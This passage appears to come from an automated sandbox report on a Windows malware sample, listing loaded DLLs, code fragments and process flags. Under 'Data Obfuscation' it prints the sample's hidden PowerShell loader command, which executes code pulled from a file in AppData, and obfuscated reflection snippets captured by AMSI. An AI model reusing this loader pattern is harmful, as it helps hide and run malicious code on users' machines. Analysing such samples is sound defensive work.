            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: dP5z8RpEyQ.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2632708521.0000000007C58000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: tem.Core.pdb source: powershell.exe, 00000002.00000002.2632708521.0000000007C83000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdb source: powershell.exe, 00000002.00000002.2632708521.0000000007C58000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdbk source: powershell.exe, 00000002.00000002.2632708521.0000000007C58000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: CallSite.Targetore.pdbd source: powershell.exe, 00000002.00000002.2638277451.0000000008D52000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            Source: Yara match | File source: 00000002.00000002.2638733328.000000000B5D3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: GetDelegateForFunctionPointer((accessitenes $Straatagetsaronernes $Knytnvens), (Byvaabnerne @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Piratelike = [AppDomain]::CurrentDomain.GetAss
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($udlsningsenhedens)), $Straatagetsrevstemtes).DefineDynamicModule($Studiemssigt52, $false).DefineType($drevnes, $Taxaflys, [System.Mult
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Retskrivningsreformer=Get-Content -raw 'C:\Users\user\AppData\Roaming\skittaget\lektier\Tegnkapacitet\Dyretmmeren.Lge';$Sammenskriv=$Retskrivningsreformer.SubString(71921,3);.$Sammenskriv($Retskrivningsreformer) "
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Retskrivningsreformer=Get-Content -raw 'C:\Users\user\AppData\Roaming\skittaget\lektier\Tegnkapacitet\Dyretmmeren.Lge';$Sammenskriv=$Retskrivningsreformer.SubString(71921,3);.$Sammenskriv($Retskrivningsreformer) "
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_04F3450F push ebp; retf 0007h | 2_2_04F3451A
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_04F34DBF pushad ; retf 0007h | 2_2_04F34DDA
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_04F3CE82 push eax; mov dword ptr [esp], edx | 2_2_04F3CE8C
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_04F310F8 push eax; ret | 2_2_04F31132
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_04F31158 push eax; ret | 2_2_04F31162
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_04F31148 push eax; ret | 2_2_04F31152
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_04F31138 push eax; ret | 2_2_04F31142
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_07E37790 push ebp; retn 3007h | 2_2_07E37A42
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_07E376D9 push FFFFFF8Bh; iretd | 2_2_07E376DB
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_07E376A0 push FFFFFF8Bh; iretd | 2_2_07E376A2
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_07E3659A push FFFFFF8Bh; iretd | 2_2_07E365A3
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_07E36561 push FFFFFF8Bh; iretd | 2_2_07E3656A
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_07E37463 push FFFFFF8Bh; iretd | 2_2_07E37465
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_07E36289 push FFFFFF8Bh; iretd | 2_2_07E3628B
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_07E36250 push FFFFFF8Bh; iretd | 2_2_07E36252
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_07E39099 push FFFFFF8Bh; iretd | 2_2_07E3909B
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_07E39060 push FFFFFF8Bh; iretd | 2_2_07E39062
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_07E31EF7 push 0007C253h; retn 0007h | 2_2_07E31F12
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_07E38ECA push FFFFFF8Bh; retf | 2_2_07E38ECC
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_07E3AA11 push FFFFFF8Bh; iretd | 2_2_07E3AA13
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_07E3A917 push FFFFFF8Bh; iretd | 2_2_07E3A919
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_07E39866 push FFFFFFE8h; iretd | 2_2_07E3986D
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_09714125 push FFFFFFC1h; retf | 2_2_09714130
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_09711187 push ds; ret | 2_2_0971126F
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_09715064 push FFFFFF9Eh; ret | 2_2_09715072
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_09711261 push ds; ret | 2_2_0971126F
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_097122BD pushfd ; retf | 2_2_097122C6
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_09711568 push eax; ret | 2_2_0971158A
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_097135B7 push 5F74BF95h; ret | 2_2_097135BE
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0971559B push eax; ret | 2_2_097155AE
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_09714F0A push ecx; retf | 2_2_09714F10

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
